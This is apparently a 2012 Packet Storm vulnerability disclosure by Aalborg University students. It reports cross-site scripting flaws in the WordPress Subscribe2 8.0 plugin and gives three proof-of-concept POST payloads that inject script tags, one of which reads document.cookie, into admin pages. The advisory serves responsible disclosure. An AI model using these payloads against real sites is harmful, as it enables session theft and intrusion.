WordPress Subscribe2 8.0 Cross Site Scripting

2012-05-15T00:00:00
ID PACKETSTORM:112688
Type packetstorm
Reporter Heine Pedersen
Modified 2012-05-15T00:00:00

Description

                                        
                                            `Hi  
  
We have used our tool, THAPS, to identify vulnerabilities in this WordPress plugin.  
We have confirmed at least one of the reported vulnerabilities and created a working exploit located below.  
  
Attached is one or more log files containing the output of our tool, identifying the location of the vulnerabilities which might help the developers locate the issue.  
  
Module: Subscribe2  
Version: 8.0  
  
Confirmed exploits:  
Exploit:  
http://wp.bacon/wp-admin/admin.php?page=s2_posts  
POST Data: subject="><script>alert(1)</script>  
  
  
Exploit:  
http://wp.bacon/wp-admin/admin.php?page=s2_settings  
POST data: _wpnonce=50a78f7b07&s2_admin=options&barred=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=Submit  
# Requires valid nonce  
  
  
Exploit:  
http://wp.bacon/wp-admin/admin.php?page=s2_tools  
POST data: searchterm="><script>alert(document.cookie)</script>  
  
  
  
  
  
Best Regards  
Heine Pedersen and Torben Jensen  
Student project group: sw101f12  
Aalborg University  
Denmark  
  
`